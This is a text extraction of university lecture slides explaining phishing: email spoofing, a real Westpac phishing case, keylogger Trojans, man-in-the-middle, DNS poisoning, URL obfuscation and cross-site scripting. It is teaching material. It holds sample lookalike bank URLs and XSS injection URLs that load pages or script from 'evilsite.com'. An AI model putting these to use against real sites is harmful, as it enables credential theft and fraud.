l1 phishing

PhishingPhishing

1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh

About me Currently, Lecturer in this department for

351 days Former Research Intern in M3C Laboratory,

University of Bolton, UK

Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2

For you Email me at [email protected] if

you want My homepage and course materials are at

http://rushdishams.googlepages.com You need to join

http://groups.google.com/group/csebatchesofrushdi


Phishing The number of unique e-mail-based fraud

attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)

Phishing e-mails pretend to come from legitimate companies, such as banks and e-commerce sites

Used by criminals to try and trick Web users into revealing personal information and account details


Phishing The number of brands targeted increased

by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006

"One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director)


Phishing Top brands continue to be hijacked, with

phishers using established names to try to lure people to their sites

eBay is often spoofed, for obvious reasons Google is increasingly being targeted because

of its expansion into different business application models.

The big banking names are used too--HSBC, Citigroup, Lloyds--all the major brands


Phishing There's no point in using local names if the attack is

global Attacks are becoming increasingly sophisticated Web sites are hosting keylogging malicious software Before, people had to click on a site to download

malicious code. If they thought a web site 'phishy,' they could leave

and probably not be harmed. Now. with most phishing sites they just have to visit

one to become infected


Phishing Twenty-five percent of those sites now host

keylogging code If you visit one you will probably open yourself

to identity theft or fraud


Exploiting the Weakness Why is it that Crooks are able to mount an

attack? What are the weaknesses that they exploit? Richness of functionality

Complex systems can have program bugs Increasing interconnectivity

Separate functions of any system are combined and interconnected via Internet


Exploiting the Weakness Expanding market in exploits

Very few people requires as the technical gadgets are impressive and cheap

The scale of content based attacks Everyone uses e-mails and e-mails are

exploitable. Then why not?


Social Engineering Factors Phishing attacks rely upon a mix of technical

deceit and social engineering practices. In the majority of cases the Phisher must

persuade the victim The victim intentionally performs a series of

actions that will provide access to confidential information


Social Engineering Factors Communication channels such as email,

web-pages, IRC and instant messaging services are popular.

Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, automated support response from their favourite online retailer, etc.) for the victim to believe.


Social Engineering Factors


Phishing Techniques Phishing attacks initiated by email are the

most common. Using Trojan Network, Phishers can deliver

specially crafted emails to millions of legitimate “live” email addresses within a few hours

Sometimes phishers purchase e-mail address


Phishing Techniques Utilising well known flaws in the common

mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organisation they choose.

Any customer replies to the phishing email will be sent to them.


Phishing Techniques Official looking and sounding emails Copies of legitimate corporate emails with

minor URL changes HTML based email used to obfuscate target

URL information Standard virus/worm attachments to emails


Phishing Techniques A plethora of anti spam-detection inclusions Crafting of “personalised” or unique email

messages Fake postings to popular message boards

and mailing lists Use of fake “Mail From:” addresses and

open mail relays for disguising the source of the email


A real-life phishing example


Things to note

The email was sent in HTML format Lower-case L’s have been replaced with upper-

case I’s. This is used to help bypass many standard anti-spam filters


Things to note

Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to a escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index.htm


Things to note


Things to note

The non-standard HTTP port of 4903 can be attributed to the fact that the Phishers fake site was hosted on a third-party PC that had been previously compromised by an attacker


Things to note

Recipients that clicked on the link were then forwarded to the real Westpac application.

However a JavaScript popup window containing a fake login page was presented to them.


Things to note

This fake login window was designed to capture and store the recipient’s authentication credentials

JavaScript also submitted the authentication information to the real Westpac application


Where are they standing now? The inclusion of HTML disguised links The use of third-party supplied, or fake,

banner advertising graphics to lure customers The use of web-bugs (hidden items within the

page – such as a zero-sized graphic) to track a potential customer

The use of pop-up or frameless windows to disguise the true source of the Phishers message.


Where are they standing now? Embedding malicious content within the

viewable web-page installs software of the Phishers choice (e.g.

key-loggers, screen-grabbers, back-doors and other Trojan horse programs).


Banner Advertising


IRC and IM New on the Phishers radar, IRC and Instant

Messaging (IM) forums are likely to become a popular phishing ground.

The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels,


Trojan Hosts the delivery source is increasingly becoming

home PC’s that have been previously compromised.

Trojan horse program has been installed which allows Phishers (along with Spammers, Warez Pirates, DDoS Bots, etc.) to use the PC as a message propagator.

tracking back a Phishing attack to an individual initiating criminal is extremely difficult.


Trojan Hosts the installation of Trojan horse software is

on the increase, despite the efforts of large anti-virus companies.

operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)

Phishers must be selective about the information they wish to record or be faced with information overload.


Information Specific Trojans You have come across a file named JavaUtil.zip. But you forgot that you have “do not show

known file extensions” in your Windows setting. Hmm, then JavaUtil.zip originally maybe a .exe

file whose full name is JavaUtil.zip.exe You, unfortunately, click that zip file to unzip it. You are doomed!


Information Specific Trojans Early in 2004, a Phisher created a custom key-logger

Trojan. The Trojan key-logger was designed specifically to

capture all key presses within windows with the titles of various names including:- commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank


Phishing Attack Vectors Man-in-the-middle Attacks URL Obfuscation Attacks Cross-site Scripting Attacks Preset Session Attacks


Man in the Middle Attacks the attacker situates themselves between the

customer and the real web-based application, and proxies all communications between the systems.

This form of attack is successful for both HTTP and HTTPS communications.

The customer connects to the attackers server as if it was the real site

The attackers server makes a simultaneous connection to the real site.


Man in the Middle Attacks The attackers server then proxies all

communications between the customer and the real web-based application server

In the case of secure HTTPS communications, an SSL connection is established between the customer and the attackers proxy

while the attackers proxy creates its own SSL connection between itself and the real server.


Man in the Middle Attacks


Man in the Middle Attacks The attacker must be able to direct the

customer to their proxy server instead of the real server.

This may be carried out through a number of methods:

Transparent Proxies DNS Cache Poisoning URL Obfuscation


Transparent Proxies Situated on the same network segment or

located on route to the real server a transparent proxy service can intercept all

data by forcing all outbound HTTP and HTTPS traffic through itself.


DNS Cache Poisoning be used to disrupt normal traffic routing by

injecting false IP addresses for key domain names.

the attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attackers proxy server IP address


URL Obfuscation the attacker tricks the customer into connecting to

their proxy server instead of the real server. the customer may follow a link tohttp://privatebanking.mybank.com.ch http://mybank.privatebanking.com http://privatebanking.mybonk.com http://privatebanking.mybánk.com http://privatebanking.mybank.hackproof.com And the real one ishttp://privatebanking.mybank.com


Third party shortened URL


Cross Site Scripting (XSS) make use of custom URL or code injection

into a valid web-based application URL the result of poor web-application

development processes.


Cross Site Scripting (XSS) Full HTML substitution such as:

http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm

Inline embedding of scripting content, such as:http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode

Forcing the page to load external scripting code, such as:

http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2


Cross Site Scripting (XSS)


Preset Session Attack


Hidden Frame


Graphical Substitution


References The Phishing Guide by Next Generation

Security Software Software Limited.


Related Papers Technical Trends in Phishing Attacks by

Jason Milletary Why Phishing Works by Dhamija et al.


l1 phishing

Technology

bangladeshrushdi

bangladeshcross

rushdi shams

fake mail

proxy server

real server

ssl connection

previously